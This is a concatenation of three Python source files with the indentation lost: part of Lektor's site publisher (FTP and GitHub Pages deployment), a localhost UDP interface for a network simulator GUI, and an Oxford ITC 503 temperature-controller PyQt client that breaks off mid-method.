yield "000 Sync done!"
yield "000 Consolidating server state ..."
self.consolidate_listing(con, current_artifacts)
for event in con.drain_log():
yield event
yield "000 All done!"
class FtpTlsPublisher(FtpPublisher):
connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
def get_credentials(self, url, credentials=None):
credentials = credentials or {}
username = credentials.get("username") or url.username
password = credentials.get("password") or url.password
rv = username
if username and password:
rv += ":" + password
return rv if rv else None
def update_git_config(self, repo, url, branch, credentials=None):
ssh_command = None
path = url.host + u"/" + url.path.strip(u"/")
cred = None
if url.scheme in ("ghpages", "ghpages+ssh"):
push_url = "git@github.com:%s.git" % path
keyfile = _write_ssh_key_file(
os.path.join(repo, ".git", "ssh-auth-key"), credentials
)
if keyfile or url.port:
ssh_command = _get_ssh_cmd(url.port, keyfile)
else:
push_url = "https://github.com/%s.git" % path
cred = self.get_credentials(url, credentials)
with open(os.path.join(repo, ".git", "config"), "a") as f:
f.write(
'[remote "origin"]\nurl = %s\n'
"fetch = +refs/heads/%s:refs/remotes/origin/%s\n"
% (push_url, branch, branch)
)
if cred:
cred_path = os.path.join(repo, ".git", "credentials")
f.write('[credential]\nhelper = store --file "%s"\n' % cred_path)
with open(cred_path, "w") as cf:
cf.write("https://%s@github.com\n" % cred)
return ssh_command
def link_artifacts(self, path):
try:
link = os.link
except AttributeError:
link = shutil.copy
# Clean old
for filename in os.listdir(path):
if filename == ".git":
continue
filename = os.path.join(path, filename)
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename)
# Add new
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if x != ".lektor"]
for filename in filenames:
full_path = os.path.join(self.output_path, dirpath, filename)
dst = os.path.join(
path,
full_path[len(self.output_path) :]
.lstrip(os.path.sep)
.lstrip(os.path.altsep or ""),
)
try:
os.makedirs(os.path.dirname(dst))
except (OSError, IOError):
pass
try:
link(full_path, dst)
except OSError: # Different Filesystems
shutil.copy(full_path, dst)
def write_cname(self, path, target_url):
params = target_url.decode_query()
cname = params.get("cname")
if cname is not None:
with open(os.path.join(path, "CNAME"), "w") as f:
f.write("%s\n" % cname)
def detect_target_branch(self, target_url):
# When pushing to the username.github.io repo we need to push to
# master, otherwise to gh-pages
if target_url.host.lower() + ".github.io" == target_url.path.strip("/").lower():
branch = "master"
else:
branch = "gh-pages"
return branch
def publish(self, target_url, credentials=None, **extra):
if not locate_executable("git"):
self.fail("git executable not found; cannot deploy.")
branch = self.detect_target_branch(target_url)
with _temporary_folder(self.env) as path:
ssh_command = None
def git(args, **kwargs):
kwargs["env"] = _patch_git_env(kwargs.pop("env", None), ssh_command)
return Command(["git"] + args, cwd=path, **kwargs)
for line in git(["init"]).output:
yield line
ssh_command = self.update_git_config(path, target_url, branch, credentials)
for line in git(["remote", "update"]).output:
yield line
if git(["checkout", "-q", branch], silent=True).wait() != 0:
git(["checkout", "-qb", branch], silent=True).wait()
self.link_artifacts(path)
self.write_cname(path, target_url)
for line in git(["add", "-f", "--all", "."]).output:
yield line
for line in git(["commit", "-qm", "Synchronized build"]).output:
yield line
for line in git(["push", "origin", branch]).output:
yield line
builtin_publishers = {
"rsync": RsyncPublisher,
"ftp": FtpPublisher,
"ftps": FtpTlsPublisher,
"ghpages": GithubPagesPublisher,
"ghpages+https": GithubPagesPublisher,
"ghpages+ssh": GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
url = urls.url_parse(text_type(target))
publisher = env.publishers.get(url.scheme)
if publisher is None:
raise PublishError('"%s" is an unknown scheme.' % url.scheme)
return publisher(env, output_path).publish(url, credentials, **extra)
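# Illustrative usage sketch (not part of the original module; assuming this file
# is importable as lektor.publisher): the publish() entry point above resolves
# the URL scheme against env.publishers and returns a generator of "000 ..."
# progress lines. The names "env" and "output_path" are assumed to come from the
# surrounding Lektor build context.
#
#     from lektor.publisher import publish, PublishError
#     try:
#         for line in publish(env, "ghpages+https://user/user.github.io", output_path,
#                             credentials={"username": "user", "password": "token"}):
#             print(line)
#     except PublishError as exc:
#         print("Deployment failed: %s" % exc)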
|
comm_udp.py
|
"""
This is the communication interface for working with the NOX-derived GUI.
It may need a little love to work again, but it'd probably be a better
idea to adapt the NOX-derived GUI to use the newer TCP stream interface
instead, as it has many advantages.
"""
import comm
import socket
import json
import threading  # needed for the receive-loop thread below
import traceback  # needed for error reporting in the receive loop
class GuiInterface(comm.NullInterface):
def __init__ (self):
self.recv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv.bind(("127.0.0.1", 4445))
self.thread = threading.Thread(target = self._recvLoop)
self.thread.daemon = True
self.thread.start()
def _recvLoop (self):
import select
while True:
(rx, tx, xx) = select.select([self.recv], [], [])
if len(rx):
d = self.recv.recv(4096)
try:
world.doLater(0, self.handle_recv, json.loads(d))
except:
traceback.print_exc()
def handle_recv (self, data):
import basics
if data['type'] == "ping":
src = getattr(sim, data['src'])
dst = getattr(sim, data['dst'])
src.send(basics.Ping(dst), flood=True)
elif data['type'] == "console":
# Execute python command, return output to GUI
#print "Got command:", data['command']
r = interp.runsource(data['command'], "<gui>")
if r:
events.send_console_more(data['command'])
def sendToGui(self, dict_msg):
sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
sock.sendto( json.dumps(dict_msg), ("127.0.0.1", 4444) )
def send_console(self, text):
self.sendToGui({'type':'console','msg':text})
def send_console_more(self, text):
self.sendToGui({'type':'console_more','command':text})
def send_log(self, record):
self.sendToGui(record)
def send_entity_up(self, name, kind):
#print name
msg = {}
msg['type'] = 'topology'
msg['command'] = 'add'
msg['node_type'] = kind
msg['node_id'] = name
self.sendToGui(msg)
def send_link_up(self, srcid, sport, dstid, dport):
msg = {}
links = [
{'src port': sport,
'src id': srcid,
'dst id': dstid,
'src type': 'switch',
'dst type': 'switch',
'dst port': dport}]
msg['type'] = 'topology'
msg['command'] = 'add'
msg['links'] = links
self.sendToGui(msg)
def send_link_down(self, srcid, sport, dstid, dport):
msg = {}
links = [
{'src port': sport,
'src id': srcid,
'dst id': dstid,
'src type': 'switch',
'dst type': 'switch',
'dst port': dport}]
msg['type'] = 'topology'
msg['command'] = 'remove'
msg['links'] = links
self.sendToGui(msg)
def highlight_path (self, nodes):
""" Sends a path to the GUI to be highlighted """
nodes = [n.name for n in nodes]
msg = {'type':'highlight', 'nodes':nodes}
self.sendToGui(msg)
def set_debug(self, nodeid, msg):
msg = {
'type' : 'debug',
'node_id' : nodeid,
'msg': msg,
}
self.sendToGui(msg)
interface = GuiInterface
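# Message format sketch (derived from the handlers above, for reference only):
# the GUI and this interface exchange JSON-encoded dicts over UDP on localhost,
# received here on port 4445 and sent to the GUI on port 4444. Typical payloads:
#
#     {"type": "ping", "src": "h1", "dst": "h2"}            # GUI -> sim: flood a Ping
#     {"type": "console", "command": "print sim"}           # GUI -> sim: run Python code
#     {"type": "topology", "command": "add",
#      "node_type": "switch", "node_id": "s1"}              # sim -> GUI: entity up
#     {"type": "highlight", "nodes": ["s1", "s2", "s3"]}    # sim -> GUI: highlight a path
#
# Node names such as "h1" or "s1" are placeholders; the real names come from the
# simulator objects (the "sim", "world", "interp" and "events" globals referenced
# above are expected to be provided by the simulator environment, not this module).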
|
ITC503_ControlClient.py
|
"""Module containing a class to run a (Oxford Instruments) ITC 503 Intelligent Temperature Controller in a pyqt5 application
Classes:
ITC_Updater: a class for interfacing with a ITC 503 Temperature Controller
inherits from AbstractLoopThread
there, the looping behaviour of this thread is defined
Author(s):
bklebel (Benjamin Klebel)
"""
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# to be removed once this is packaged!
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtCore import QSettings
from PyQt5 import QtWidgets
# import json
# import sys
from threading import Lock
from threading import Thread
import time
import numpy as np
from copy import deepcopy
import logging
from util import ExceptionHandling
from util import AbstractLoopThreadClient
from util import Window_trayService_ui
from util import readPID_fromFile
from util import AbstractMainApp
# from zmqcomms import dec, enc
from datetime import datetime
from Oxford import itc503
from drivers import ApplicationExit
from pyvisa.errors import VisaIOError
class ITC503_ControlClient(AbstractLoopThreadClient):
"""Control class to update all instrument data of the Intelligent Temperature Controller (ITC) 503.
For each ITC 503 function (except data collection) there is a wrapping method,
which can be called via a signal from the main thread. This wrapper sends
the corresponding value to the device.
For every wrapper there is a second method which accepts the corresponding
value and stores it, so it can be sent upon acknowledgment.
The information from the device is collected at regular intervals (method "running")
and subsequently sent to the main thread, packed in a dict whose keys are
listed in the "sensors" dict of this class.
"""
# exposable data dictionary
data = {}
sensors = dict(
set_temperature=0,
Sensor_1_K=1,
Sensor_2_K=2,
Sensor_3_K=3,
temperature_error=4,
heater_output_as_percent=5,
heater_output_as_voltage=6,
gas_flow_output=7,
proportional_band=8,
integral_action_time=9,
derivative_action_time=10,
)
def __init__(self, mainthread=None, InstrumentAddress="", **kwargs):
super().__init__(**kwargs)
# self.logger = log if log else logging.getLogger(__name__)
# here the class instance of the LakeShore should be handed
self.__name__ = "ITC_control " + InstrumentAddress
self._logger = logging.getLogger(
"CryoGUI." + __name__ + "." + self.__class__.__name__
)
self.interval = 1.7
# -------------------------------------------------------------------------------------------------------------------------
# Interface with hardware device
self.ITC = itc503(InstrumentAddress=InstrumentAddress)
# -------------------------------------------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# initial configurations for the hardware device
self.control_state = 3
self.set_temperature = 0
self.set_prop = 0
self.set_integral = 0
self.set_derivative = 0
self.set_sensor = 1
self.set_heater_output = 0
self.set_gas_output = 0
self.set_auto_manual = 0
self.sweep_parameters = None
self.sweep_running = False
self.sweep_running_device = False
self.checksweep(stop=False)
self.sweep_ramp = 0
self.sweep_first = False
self.setControl()
self.setPIDFile(".\\..\\configurations\\PID_conf\\P1C1.conf")
self.useAutoPID = True
if mainthread is not None:
mainthread.sig_useAutocheck.connect(self.setCheckAutoPID)
mainthread.sig_newFilePID.connect(self.setPIDFile)
mainthread.sig_sendConfTemp.connect(self.setTemperature)
mainthread.sig_stopSweep.connect(self.stopSweep)
self.data_last = {}
self.lock_newthread = Lock()
# -------------------------------------------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# def change_gas(self):
# """to be worked in a separate worker thread (separate
# time.sleep() from GUI)
# change the opening percentage of the needle valve in a
# repeatable fashion (go to zero, go to new value)
# disable the GUI element during the operation
# should be changed, to use signals to change GUI,
# and possibly timers instead of time.sleep()
# (QTimer not usefil in the second case)
# """
# if self.ITC_window.checkGas_gothroughzero.isChecked():
# gas_new = self.threads['control_ITC'][0].set_gas_output
# with self.dataLock:
# gas_old = int(self.data['ITC']['gas_flow_output'])
# if gas_new == 0:
# time_wait = 60 / 1e2 * gas_old + 5
# self.threads['control_ITC'][0].setGasOutput()
# self.ITC_window.spinsetGasOutput.setEnabled(False)
# time.sleep(time_wait)
# self.ITC_window.spinsetGasOutput.setEnabled(True)
# else:
# time1 = 60 / 1e2 * gas_old + 5
# time2 = 60 / 1e2 * gas_new + 5
# self.threads['control_ITC'][
# 0].gettoset_GasOutput(0)
# self.threads['control_ITC'][0].setGasOutput()
# self.ITC_window.spinsetGasOutput.setEnabled(False)
# time.sleep(time1)
# self.threads['control_ITC'][
# 0].gettoset_GasOutput(gas_new)
# self.threads['control_ITC'][0].setGasOutput()
# time.sleep(time2)
# self.ITC_window.spinsetGasOutput.setEnabled(True)
# else:
# self.threads['control_ITC'][0].setGasOutput()
mainthread.spinsetGasOutput.valueChanged.connect(self.gettoset_GasOutput)
mainthread.spinsetGasOutput.editingFinished.connect(self.setGasOutput)
mainthread.spinsetHeaterPercent.valueChanged.connect(self.gettoset_HeaterOutput)
mainthread.spinsetHeaterPercent.editingFinished.connect(self.setHeaterOutput)
mainthread.spinsetProportionalID.valueChanged.connect(
self.gettoset_Proportional
)
mainthread.spinsetProportionalID.editingFinished.connect(self.setProportional)
mainthread.spinsetPIntegrationD.valueChanged.connect(self.gettoset_Integral)
mainthread.spinsetPIntegrationD.editingFinished.connect(self.setIntegral)
mainthread.spinsetPIDerivative.valueChanged.connect(self.gettoset_Derivative)
mainthread.spinsetPIDerivative.editingFinished.connect(self.setDerivative)
mainthread.combosetHeatersens.activated["int"].connect(
lambda value: self.setHeaterSensor(value + 1)
)
mainthread.combosetAutocontrol.activated["int"].connect(self.setAutoControl)
# -------------------------------------------------------------------------------------------------------------------------
mainthread.spin_threadinterval.valueChanged.connect(self.setInterval)
# @control_checks
@ExceptionHandling
def running(self):
"""
Try to extract all current data from the ITC 503,
and emit a signal sending the data
"""
# print('run')
self.run_finished = False
# -------------------------------------------------------------------------------------------------------------------------
# data collection for to be exposed on the data upstream
# to be stored in self.data
# self.data['status'] = self.read_status()
self.data["temperature_error"] = self.ITC.getValue(
self.sensors["temperature_error"]
)
self.data["set_temperature"] = self.ITC.getValue(
self.sensors["set_temperature"]
)
for key in self.sensors:
try:
value = self.ITC.getValue(self.sensors[key])
self.data[key] = value
self.data_last[key] = value
except AssertionError as e_ass:
self.sig_assertion.emit(e_ass.args[0])
self._logger.exception(e_ass)
self.data[key] = None
except VisaIOError as e_visa:
if (
isinstance(e_visa, type(self.timeouterror))
and e_visa.args == self.timeouterror.args
):
self.sig_visatimeout.emit()
self.ITC.clear_buffers()
self.data[key] = None
else:
# raise e_visa
self._logger.exception(e_visa)
self.sig_visaerror.emit(e_visa.args[0])
# print('retrieving', time.time()-starttime, self.data['Sensor_1_K'])
# with "calc" in name it would not enter calculations!
self.data["Sensor_1_calerr_K"] = (
self.data["set_temperature"] - self.data["temperature_error"]
)
self.data_last["status"] = self.read_status()
self.data_last["sweep"] = self.checksweep(stop=False)
self.data["autocontrol"] = int(self.data_last["status"]["auto_int"])
if self.useAutoPID:
self.set_PID(temperature=self.data["Sensor_1_K"])
self.data["realtime"] = datetime.now()
# -------------------------------------------------------------------------------------------------------------------------
self.sig_Infodata.emit(deepcopy(self.data))
self.run_finished = True
@ExceptionHandling
def act_on_command(self, command):
"""execute commands sent on downstream"""
pass
# -------------------------------------------------------------------------------------------------------------------------
# commands, like for adjusting a set temperature on the device
# commands are received via zmq downstream, and executed here
# examples:
if "setTemp_K" in command:
# the value for this key must be the required dictionary!
self.setTemperature(command["setTemp_K"])
# if 'configTempLimit' in command:
# self.configTempLimit(command['configTempLimit'])
if "setInterval" in command:
self.setInterval(command["setInterval"])
if "setDerivative" in command:
self.gettoset_Derivative(command["setDerivative"])
self.setDerivative()
if "setIntegral" in command:
self.gettoset_Integral(command["setIntegral"])
self.setIntegral()
if "setProportional" in command:
self.gettoset_Proportional(command["setProportional"])
self.setProportional()
if "setHeaterOutput" in command:
self.gettoset_HeaterOutput(command["setHeaterOutput"])
self.setHeaterOutput()
if "setGasOutput" in command:
self.gettoset_GasOutput(command["setGasOutput"])
self.setGasOutput()
if "gothroughzero" in command:
self._logger.warning(
"go through zero not implemented, command %s has been ignored"
% command["gothroughzero"]
)
"""Has to be implemented"""
if "setAutoControl" in command:
self.setAutoControl(command["setAutoControl"])
if "setHeaterSensor" in command:
self.setHeaterSensor(command["commsetHeaterSensor"])
if "ConfloaD" in command:
self.setPIDFile(command["PIDFile"])
self.setCheckAutoPID(command["useAuto"])
if command["useAuto"] == 1:
self.set_PID(temperature=self.data["Sensor_1_K"])
# -------------------------------------------------------------------------------------------------------------------------
@ExceptionHandling
def query_on_command(self, command):
"""execute commands sent via tcp"""
answer_dict = {}
# -------------------------------------------------------------------------------------------------------------------------
# commands, like for adjusting a set temperature on the device
# commands are received via zmq tcp, and executed here
if "measure_Sensor_K" in command: # value could be the sensor number
answer_dict["Temperature_K"] = self.ITC.getValue(self.sensors["Sensor_1_K"])
self.act_on_command(command)
answer_dict["OK"] = True
return answer_dict
# -------------------------------------------------------------------------------------------------------------------------
@ExceptionHandling
def setCheckAutoPID(self, boolean):
"""reaction to signal: set AutoPID behaviour"""
self.useAutoPID = boolean
@ExceptionHandling
def setPIDFile(self, file):
"""reaction to signal: set AutoPID lookup file"""
self.PIDFile = file
self.PID_configuration = readPID_fromFile(self.PIDFile)
@ExceptionHandling
def read_status(self, run=True):
"""read the device status"""
self.device_status = self.ITC.getStatus(run)
return self.device_status
# @pyqtSlot(int)
# def set_delay_sending(self, delay):
# self.ITC.set_delay_measuring(delay)
@ExceptionHandling
def set_PID(self, temperature):
"""set the PID values acorrding to the configuration
configuration should be stored in self.PID_configuration:
a tuple, with
the first entry being a list of temperatures
the second entry being a list of dicts with p, i, d values"""
try:
PID_id = np.where(self.PID_configuration[0] > temperature)[0][0]
except IndexError:
PID_id = -1
PID_conf = self.PID_configuration[1][PID_id]
self.set_prop = PID_conf["p"]
self.set_integral = PID_conf["i"]
self.set_derivative = PID_conf["d"]
self.setProportional()
self.setIntegral()
self.setDerivative()
# def startSweep(self, d):
# with self.lock:
# self.setSweep(setpoint_temp=d['end'],
# rate=d['SweepRate'],
# start=d['start'])
# self.ITC.SweepStart()
# self.ITC.getValue(0) # whatever this is needed for
@ExceptionHandling
def stopSweep(self):
# with self.lock:
self.setSweep(setpoint_temp=self.ITC.getValue(0), rate=50, start=False)
time.sleep(0.1)
self.ITC.SweepJumpToLast()
time.sleep(0.1)
@pyqtSlot()
@ExceptionHandling
def setSweep(self, setpoint_temp, rate, start=False):
# with self.lock:
if start:
setpoint_now = start
else:
setpoint_now = self.ITC.getValue(0)
# print('setpoint now = ', setpoint_now)
if rate == 0:
n_sweeps = 0
sweep_times = [0.1]
sweep_temps = [setpoint_temp]
# print('rate was zero!')
else:
delta_Temperature = setpoint_temp - setpoint_now
sweep_time = abs(delta_Temperature) / rate
if sweep_time < 0.1:
# print('sweeptime below 0.1: ', sweep_time)
sweep_time = 0.1
if sweep_time > 20e3:
raise AssertionError(
"A sweep can be maximal 15 * 23h long (about 20 000 minutes, about 205K at 0.01 K/min)!"
)
if sweep_time > 23.5 * 60:
# not only one step suffices, as the maximum time for one step
# is 24 hours (using 23.5 for safety)
# calculate number of full steps
n_sweeps = int(sweep_time / (23 * 60))
# calculate remaining time in minutes
remaining_min = sweep_time - n_sweeps * 23 * 60
# make list with full sweep times
sweep_times = [23 * 60 for n in range(n_sweeps)]
# make list with full sweep temps
sweep_temps = [
setpoint_now + delta_Temperature * 23 * 60 / sweep_time * (n + 1)
for n in range(n_sweeps)
]
if not np.isclose(0, remaining_min):
# append remaining times and temps in case the user
# did not hit a mark
sweep_times += [remaining_min]
sweep_temps += [setpoint_temp]
else:
n_sweeps = 0
sweep_times = [sweep_time]
sweep_temps = [setpoint_temp]
sp = {
str(z): dict(set_point=setpoint_temp, hold_time=0, sweep_time=0)
for z in range(1, 17)
}
sp.update(
{
str(1): dict(set_point=setpoint_now, hold_time=0, sweep_time=0),
# str(2): dict(set_point=setpoint_temp,
# hold_time=0,
# sweep_time=sweep_time),
# str(15): dict(set_point=setpoint_temp,
# hold_time=0,
# sweep_time=0),
str(16): dict(set_point=setpoint_temp, hold_time=0, sweep_time=0.1),
}
)
# fill up the steps
sp.update(
{
str(z + 2): dict(
set_point=sweep_temps[z], hold_time=0, sweep_time=sweep_times[z]
)
for z in range(n_sweeps + 1)
}
)
self.sweep_parameters = sp
# print('setting sweep to', self.sweep_parameters)
self.ITC.setSweeps(self.sweep_parameters)
# self.ITC.getValue(0)
# print('sweep table read from device:')
# for x in self.ITC.readSweepTable():
# print(x)
# @pyqtSlot(bool)
# @ExceptionHandling
# def setSweepStatus(self, bools):
# self.sweep_running = bools
# # print('set sweep status to', bools)
# with self.lock:
# # print('sweepstatus: I locked the thread!')
# if not bools:
# # print('sweepstatus: stopping the sweep')
# self.checksweep()
# self.ITC.setTemperature(self.set_temperature)
# # print('sweepstatus: I unlocked the device')
# # if bools:
# # print('set the sweep status: ', bools)
# # print('sweepstatus: set the temperature')
# # self.setTemperature()
# @pyqtSlot(float)
# @ExceptionHandling
# def gettoset_sweepRamp(self, value):
# self.sweep_ramp = value
# # print('set sweep ramp to', value)
@ExceptionHandling
def checksweep(self, stop=True):
# print('checking sweep')
status = self.read_status(run=False)
# print(status)
try:
int(status["sweep"])
status["sweep"] = bool(int(status["sweep"]))
except ValueError:
status["sweep"] = True
# print('sweep status: ', status['sweep'])
self.sweep_running_device = status["sweep"]
if stop and status["sweep"]:
# print('setTemp: sweep running, stopping sweep')
self.stopSweep()
return self.sweep_running_device
# else:
# print('I did not see a running sweep!',
# self.device_status['sweep'])
# print('sweep was/is running: ', self.device_status['sweep'])
@pyqtSlot(dict)
@ExceptionHandling
def setTemperature(self, values):
"""set Temperature of the instrument
dict(isSweep=isSweep,
isSweepStartCurrent=isSweepStartCurrent,
setTemp=setTemp,
start=start,
end=end,
SweepRate=SweepRate)
"""
values["self"] = self
def settingtheTemp(values):
instance = values["self"]
# stop sweep if it runs
if "start" in values:
starting = values["start"]
else:
starting = instance.ITC.getValue(0)
start = (
instance.ITC.getValue(0) if values["isSweepStartCurrent"] else starting
)
instance.checksweep(stop=True)
autocontrol = instance.data_last["status"]["auto_int"]
instance.ITC.setAutoControl(0)
while instance.data_last["sweep"]:
time.sleep(0.01)
time.sleep(0.1)
# print('sleeping')
with instance.lock:
if values["isSweep"]:
# set up sweep
instance.setSweep(
setpoint_temp=values["end"],
rate=values["SweepRate"],
start=start,
)
instance.ITC.SweepStart()
# whatever this is needed for, does not work without
instance.ITC.getValue(0)
else:
instance.ITC.setTemperature(values["setTemp"])
instance.ITC.setAutoControl(autocontrol)
with self.lock_newthread:
t1 = Thread(target=settingtheTemp, args=(values,))
t1.start()
# with self.lock:
# self.checksweep()
# if not self.sweep_running:
# self.ITC.setTemperature(value)
# # print(f'setting ITC temperature: {value}')
# # self.set_temperature = temp
# else:
# # print('setTemp: setting sweep.')
# self.setSweep(value, self.sweep_ramp)
# # print('starting sweep!')
# # print(f'setting ITC sweep: {value}')
# self.ITC.SweepStart()
# self.ITC.getValue(0)
# @pyqtSlot(float)
# @ExceptionHandling
# def setSweepRamp(self):
# with self.lock:
# if self.sweep_running:
# self.checksweep()
# self.setSweep(self.set_temperature, self.sweep_ramp)
# self.ITC.SweepStart()
# self.ITC.getValue(0)
@pyqtSlot()
@ExceptionHandling
def setControl(self):
"""set Control of the instrument"""
self.ITC.setControl(self.control_state)
@pyqtSlot()
@ExceptionHandling
def setProportional(self):
"""set Proportional of the instrument
prop: Proportional band, in steps of 0.0001K.
"""
self.ITC.setProportional(self.set_prop)
@pyqtSlot()
@ExceptionHandling
def setIntegral(self):
"""set Integral of the instrument
integral: Integral action time, in steps of 0.1 minute.
Ranges from 0 to 140 minutes.
"""
self.ITC.setIntegral(self.set_integral)
@pyqtSlot()
@ExceptionHandling
def setDerivative(self):
"""set Derivative of the instrument
derivative: Derivative action time.
Ranges from 0 to 273 minutes.
"""
self.ITC.setDerivative(self.set_derivative)
@pyqtSlot(int)
@ExceptionHandling
def setHeaterSensor(self, value):
"""set HeaterSensor of the instrument
sensor: Should be 1, 2, or 3, corresponding to
the heater on the front panel.
"""
self.set_sensor = value
self.ITC.setHeaterSensor(self.set_sensor)
@pyqtSlot()
@ExceptionHandling
def setHeaterOutput(self):
"""set HeaterOutput of the instrument
heater_output: Sets the percent of the maximum
heater output in units of 0.1%.
Min: 0. Max: 999.
"""
self.ITC.setHeaterOutput(self.set_heater_output)
@pyqtSlot()
@ExceptionHandling
def setGasOutput(self):
"""set GasOutput of the instrument
gas_output: Sets the percent of the maximum gas
output in units of 1%.
Min: 0. Max: 99.
"""
self.ITC.setGasOutput(self.set_gas_output)
@pyqtSlot(int)
@ExceptionHandling
def setAutoControl(self, value):
"""set AutoControl of the instrument
Value:Status map
0: heater manual, gas manual
1: heater auto , gas manual
2: heater manual, gas auto
3: heater auto , gas auto
"""
self.set_auto_manual = value
self.ITC.setAutoControl(self.set_auto_manual)
@pyqtSlot(int)
def gettoset_Control(self, value):
"""receive and store the value to set the Control status"""
self.control_state = value
# @pyqtSlot(float)
# def gettoset_Temperature(self, value):
# """receive and store the value to set the temperature"""
# self.set_temperature = value
# # print('got a new temp:', value)
@pyqtSlot(float)
def gettoset_Proportional(self, value):
"""receive and store the value to set the proportional (PID)"""
self.set_prop = value
@pyqtSlot(float)
def gettoset_Integral(self, value):
"""receive and store the value to set the integral (PID)"""
self.set_integral = value
@pyqtSlot(float)
def gettoset_Derivative(self, value):
"""receive and store the value to set the derivative (PID)"""
self.set_derivative = value
@pyqtSlot(float)
def gettoset_HeaterOutput(self, value):
"""receive and store the value to set the heater_output"""
self.set_heater_output = value
@pyqtSlot(float)
def gettoset_GasOutput(self, value):
"""receive and store the value to set the gas_output"""
self.set_gas_output = value
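# Command sketch (for reference only, based on act_on_command()/query_on_command()
# above): commands arrive as plain dicts on the zmq downstream; the transport
# wiring itself lives in AbstractLoopThreadClient and is not shown here. The
# numeric values below are purely illustrative, not defaults.
#
#     command = {
#         "setTemp_K": dict(           # handled by setTemperature()
#             isSweep=True,
#             isSweepStartCurrent=True,
#             setTemp=4.2,             # K, used when isSweep is False
#             start=None,
#             end=10.0,                # K, sweep end point
#             SweepRate=2,             # K/min
#         ),
#         "setInterval": 1.7,          # data-collection interval in seconds
#         "setAutoControl": 3,         # 3 = heater auto, gas auto (see setAutoControl)
#     }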
class ITCGUI(AbstractMainApp, Window_trayService_ui):
"""docstring for ITCGUI"""
sig_sendConfTemp = pyqtSignal(dict)
sig_useAutocheck = pyqtSignal(bool)
sig_newFilePID = pyqtSignal(str)
sig_stopSweep = pyqtSignal()
def __init__(
self, identity=None, InstrumentAddress=None, prometheus_port=None, **kwargs
):
self._identity = identity
self._InstrumentAddress = InstrumentAddress
self._prometheus_port = prometheus_port
super().__init__(**kwargs)
self._logger = logging.getLogger(
"CryoGUI." + __name__ + "." + self.__class__.__name__
)
self.__name__ = "ITC_Window"
self.ITC_values = dict(setTemperature=4, SweepRate=2)
self.controls = [self.groupSettings]
self._useAutoPID = True
self._PIDFile = "./../configurations/PID_conf/P1C1.conf"
self.checkUseAuto.toggled["bool"].connect(self.fun_useAutoPID)
# self.lineConfFile.textEdited.connect(
# self.ITC_PIDFile_store)
self.pushConfLoad.clicked.connect(self.fun_PIDFile_send)
self.pushConfBrowse.clicked.connect(self.window_FileDialogOpen)
# self.lineConfFile.returnPressed.connect(
# self.fun_PIDFile_send)
QTimer.singleShot(0, self.load_settings)
QTimer.singleShot(0, self.run_Hardware)
@pyqtSlot(float)
@ExceptionHandling
def fun_setTemp_valcha(self, value):
# self.threads['control_ITC'][0].gettoset_Temperature(value)
self.ITC_values["setTemperature"] = value
@pyqtSlot(float)
@ExceptionHandling
def fun_setRamp_valcha(self, value):
self.ITC_values["SweepRate"] = value
# self.threads['control_ITC'][0].gettoset_sweepRamp(value)
@pyqtSlot(bool)
@ExceptionHandling
def fun_checkSweep_toggled(self, boolean):
self.ITC_values["Sweep_status_software"] = boolean
@pyqtSlot()
@ExceptionHandling
def fun_sendConfTemp(self):
self.fun_startTemp(
isSweep=self.ITC_values["Sweep_status_software"],
isSweepStartCurrent=True,
setTemp=self.ITC_values["setTemperature"],
end=self.ITC_values["setTemperature"],
SweepRate=self.ITC_values["SweepRate"],
)
# @pyqtSlot(dict)
# @ExceptionHandling
# def ITC_fun_routeSignalTemps(self, d: dict) -> None:
# self.ITC_fun_startTemp(isSweep=d['Sweep_status_software'],
# isSweepStartCurrent=d['isSweepStartCurrent'],
# setTemp=d['setTemperature'],
# end=d['setTemperature'],
# SweepRate=d['SweepRate'])
@pyqtSlot(dict)
def fun_startTemp(
self,
isSweep=False,
isSweepStartCurrent=True,
setTemp=4,
start=None,
end=5,
SweepRate=2,
):
self.sig_sendConfTemp.emit(
dict(
isSweep=isSweep,
isSweepStartCurrent=isSweepStartCurrent,
setTemp=setTemp,
start=start,
end=end,
SweepRate=SweepRate,
)
)
@pyqtSlot()
def run_Hardware(self):
"""method to start/stop the thread which controls the Oxford ITC"""
try:
getInfodata = self.running_thread_control(
ITC503_ControlClient(
InstrumentAddress=self._InstrumentAddress,
mainthread=self,
identity=self._identity,
prometheus_port=self._prometheus_port,
prometheus_name=self._identity,
),
"Hardware",
)
self.ITC_values["setTemperature"] = getInfodata.ITC.getValue(0)
with getInfodata.lock:
sweepstatus = getInfodata.checksweep(stop=False)
self.ITC_values["Sweep_status_software"] = sweepstatus
self.checkRamp_Status.setChecked(sweepstatus)
getInfodata.sig_Infodata.connect(self.updateGUI)
# getInfodata.sig_visaerror.connect(self.printing)
# getInfodata.sig_visaerror.connect(self.show_error_general)
# # getInfodata.sig_assertion.connect(self.printing)
# getInfodata.sig_assertion.connect(self.show_error_general)
# getInfodata.sig_visatimeout.connect(
# lambda: self.show_error_general('ITC: timeout'))
# setting ITC values by GUI
self.spinSetTemp_K.valueChanged.connect(self.fun_setTemp_valcha)
self.checkRamp_Status.toggled["bool"].connect(self.fun_checkSweep_toggled)
self.spinSetRamp_Kpmin.valueChanged.connect(self.fun_setRamp_valcha)
self.commandSendConfTemp.clicked.connect(self.fun_sendConfTemp)
# self.sig_useAutocheck.emit(self.window_settings.temp_ITC_useAutoPID)
# self.sig_newFilePID.emit(self.window_settings.temp_ITC_PIDFile)
except (VisaIOError, NameError) as e:
self._logger.exception(e)
raise ApplicationExit("Could not connect to Hardware!")
@pyqtSlot(dict)
def updateGUI(self, data):
"""
Store the received ITC data in self.data and update the display elements
of the ITC window accordingly.
"""
# with self.dataLock:
# print('storing: ', self.time_itc[-1]-time.time(), data['Sensor_1_K'])
# self.time_itc.append(time.time())
self.data.update(data)
# this needs to draw from the self.data['INSTRUMENT'] so that in case one of the keys did not show up,
# since the command failed in the communication with the device,
# the last value is retained
for key in self.data:
if self.data[key] is None:
self.data[key] = np.nan
